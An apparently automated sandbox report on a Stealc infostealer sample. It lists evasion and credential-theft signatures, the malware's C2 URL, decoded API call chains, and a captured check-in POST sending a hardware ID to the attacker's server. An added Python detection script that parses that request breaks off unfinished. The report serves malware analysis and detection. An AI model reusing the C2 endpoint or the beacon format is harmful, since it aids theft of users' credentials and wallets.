
Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1561922
MD5: 969e7116d6269d76ae0df0b8126872e9
SHA1: 30b1390b554c8d1e0b0a9af308488276cd13beb9
SHA256: d2a488577867cfd25a06cca8c590e7054429f50bfeecb35d641aac911a8ccdb0
Tags: exe, user-Bitsight

Detection

Stealc
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found evaded block containing many API calls
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • file.exe (PID: 7604 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 969E7116D6269D76AE0DF0B8126872E9)
  • cleanup
Name: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, Stealc is a non-resident stealer with flexible data collection settings, and its development draws on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, browser extensions and desktop cryptocurrency wallet applications, and from other applications (messengers, email clients, etc.). The malware downloads seven legitimate third-party DLLs to collect sensitive data from web browsers: sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: No Attribution
Blogpost URLs: (none listed)
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
{"C2 url": "http://185.215.113.206/c4becf79229cb002.php"}
Source | Rule | Description | Author
dump.pcap | JoeSecurity_Stealc_1 | Yara detected Stealc | Joe Security
00000003.00000003.1288333304.0000000005050000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
00000003.00000002.1375859223.000000000131E000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
Process Memory Space: file.exe PID: 7604 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security
Process Memory Space: file.exe PID: 7604 | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
              No Sigma rule has matched
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-24T20:01:19.759532+0100 | 2044243 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49706 | 185.215.113.206 | 80 | TCP

              AV Detection

              Source: file.exe | Avira: detected
              Source: http://185.215.113.206/&~ | Avira URL Cloud: Label: malware
              Source: 00000003.00000002.1375859223.000000000131E000.00000004.00000020.00020000.00000000.sdmp | Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.206/c4becf79229cb002.php"}
              Source: file.exe | ReversingLabs: Detection: 39%
              Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
              Source: file.exe | Joe Sandbox ML: detected
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_006A4C50 lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,InternetConnectA,HttpOpenRequestA,lstrcpy,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,lstrlen,lstrcpy,lstrcat,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,3_2_006A4C50
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_006A60D0 lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,GetProcessHeap,RtlAllocateHeap,lstrlen,lstrlen,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,lstrlen,lstrcpy,lstrcat,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,3_2_006A60D0
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_006C40B0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,3_2_006C40B0
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_006B6960 lstrcpy,SHGetFolderPathA,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,LocalAlloc,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetProcessHeap,RtlAllocateHeap,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrlen,lstrlen,lstrlen,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,3_2_006B6960
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_006AEA30 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,3_2_006AEA30
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_006B6B79 lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetProcessHeap,RtlAllocateHeap,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrlen,lstrlen,lstrlen,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,3_2_006B6B79
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_006A9B20 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,3_2_006A9B20
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_006A9B80 CryptUnprotectData,LocalAlloc,LocalFree,3_2_006A9B80
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_006A7750 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,3_2_006A7750
              Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_006B18A0 lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,3_2_006B18A0
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_006B3910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,DeleteFileA,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,3_2_006B3910
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_006B1269 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,3_2_006B1269
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_006B1250 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,3_2_006B1250
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_006BE210 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,3_2_006BE210
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_006B4B29 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,3_2_006B4B29
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_006B4B10 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,3_2_006B4B10
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_006BCBE0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,CreateFileA,GetFileSizeEx,CloseHandle,CloseHandle,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,3_2_006BCBE0
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_006B23A9 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,3_2_006B23A9
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_006ADB80 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,GetFileAttributesA,StrCmpCA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,3_2_006ADB80
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_006ADB99 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,3_2_006ADB99
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_006B2390 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,3_2_006B2390
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_006BDD30 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,lstrcpy,3_2_006BDD30
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_006BD530 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcpy,lstrcpy,FindNextFileA,FindClose,3_2_006BD530
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_006A16A0 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,3_2_006A16A0
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_006A16B9 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,3_2_006A16B9

              Networking

              Source: Network traffic | Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.7:49706 -> 185.215.113.206:80
              Source: Malware configuration extractor | URLs: http://185.215.113.206/c4becf79229cb002.php
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AAFIJKKEHJDHJKFIECAAHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 41 46 49 4a 4b 4b 45 48 4a 44 48 4a 4b 46 49 45 43 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 33 33 41 32 30 32 42 34 44 38 38 31 35 33 35 34 31 38 33 32 30 0d 0a 2d 2d 2d 2d 2d 2d 41 41 46 49 4a 4b 4b 45 48 4a 44 48 4a 4b 46 49 45 43 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 41 41 46 49 4a 4b 4b 45 48 4a 44 48 4a 4b 46 49 45 43 41 41 2d 2d 0d 0a Data Ascii: ------AAFIJKKEHJDHJKFIECAAContent-Disposition: form-data; name="hwid"133A202B4D881535418320------AAFIJKKEHJDHJKFIECAAContent-Disposition: form-data; name="build"mars------AAFIJKKEHJDHJKFIECAA--
              Source: Joe Sandbox View | IP Address: 185.215.113.206
              Source: Joe Sandbox View | ASN Name: WHOLESALECONNECTIONSNL
              Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.206 (7 identical entries; the configured C2 is an IP literal, so no DNS lookup precedes the connection)
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_006A6C40 lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,lstrcpy,3_2_006A6C40
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
              Source: unknownHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AAFIJKKEHJDHJKFIECAAHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 41 46 49 4a 4b 4b 45 48 4a 44 48 4a 4b 46 49 45 43 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 33 33 41 32 30 32 42 34 44 38 38 31 35 33 35 34 31 38 33 32 30 0d 0a 2d 2d 2d 2d 2d 2d 41 41 46 49 4a 4b 4b 45 48 4a 44 48 4a 4b 46 49 45 43 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 41 41 46 49 4a 4b 4b 45 48 4a 44 48 4a 4b 46 49 45 43 41 41 2d 2d 0d 0a Data Ascii: ------AAFIJKKEHJDHJKFIECAAContent-Disposition: form-data; name="hwid"133A202B4D881535418320------AAFIJKKEHJDHJKFIECAAContent-Disposition: form-data; name="build"mars------AAFIJKKEHJDHJKFIECAA--
              Source: file.exe, 00000003.00000002.1375859223.000000000131E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206
              Source: file.exe, 00000003.00000002.1375859223.0000000001379000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000002.1375859223.000000000131E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/
              Source: file.exe, 00000003.00000002.1375859223.0000000001379000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/&~
              Source: file.exe, 00000003.00000002.1375859223.0000000001379000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.php
              Source: file.exe, 00000003.00000002.1375859223.0000000001379000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.php#
              Source: file.exe, 00000003.00000002.1375859223.0000000001379000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.php2
              Source: file.exe, 00000003.00000002.1375859223.0000000001379000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.php9
              Source: file.exe, 00000003.00000002.1375859223.0000000001379000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpK
              Source: file.exe, 00000003.00000002.1375859223.0000000001379000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpw
              Source: C:\Users\user\Desktop\file.exeCode function: 3_2_006A9770 memset,memset,lstrcat,lstrcat,lstrcat,memset,wsprintfA,OpenDesktopA,CreateDesktopA,lstrcat,lstrcat,lstrcat,memset,SHGetFolderPathA,lstrcpy,StrStrA,lstrcpyn,lstrlen,wsprintfA,lstrcpy,Sleep,CloseDesktop,3_2_006A9770
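The check-in POST captured above is the most reusable detection artefact on this page: a multipart body with exactly two fields (hwid and build), no User-Agent header, and a 16-hex-character .php gate path. The block below is an added example for this report, not Joe Sandbox or Stealc code. It rebuilds the request from the captured headers and the 211-byte "Data Ascii" body shown in the report, parses the multipart form, and scores the request; the benign login request used for contrast, the field-set rule, the gate-path pattern and the two-indicator threshold are the author's assumptions.

```python
"""Parse the check-in POST captured in this report and score it.

Added example for this report, not Joe Sandbox or Stealc code.  The request is
rebuilt from the captured headers and the 211-byte 'Data Ascii' body shown above;
the benign request, the field-set rule and the gate-path pattern are the author's
own assumptions used to illustrate a detection, not part of the report."""
import re

BOUNDARY = "----AAFIJKKEHJDHJKFIECAA"

# Reconstructed from the report's 'Data Ascii' field (two form fields, 211 bytes).
BODY = (
    f"--{BOUNDARY}\r\n"
    'Content-Disposition: form-data; name="hwid"\r\n\r\n'
    "133A202B4D881535418320\r\n"
    f"--{BOUNDARY}\r\n"
    'Content-Disposition: form-data; name="build"\r\n\r\n'
    "mars\r\n"
    f"--{BOUNDARY}--\r\n"
).encode("ascii")

# Headers exactly as captured: note there is no User-Agent at all.
CAPTURED_REQUEST = (
    b"POST /c4becf79229cb002.php HTTP/1.1\r\n"
    b"Content-Type: multipart/form-data; boundary=" + BOUNDARY.encode("ascii") + b"\r\n"
    b"Host: 185.215.113.206\r\n"
    b"Content-Length: " + str(len(BODY)).encode("ascii") + b"\r\n"
    b"Connection: Keep-Alive\r\n"
    b"Cache-Control: no-cache\r\n\r\n"
) + BODY

# Constructed ordinary form login, for contrast (assumption, not from the report).
BENIGN_REQUEST = (
    b"POST /login HTTP/1.1\r\n"
    b"Host: example.test\r\n"
    b"User-Agent: Mozilla/5.0\r\n"
    b"Content-Type: application/x-www-form-urlencoded\r\n"
    b"Content-Length: 13\r\n\r\n"
    b"user=a&pass=b"
)

CHECKIN_FIELDS = {"hwid", "build"}              # assumption: the check-in shape seen above
GATE_PATH = re.compile(r"/[0-9a-f]{16}\.php$")  # assumption: 16-hex-char PHP gate


def parse_request(raw: bytes):
    """Split a raw HTTP/1.1 request into (method, path, headers, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
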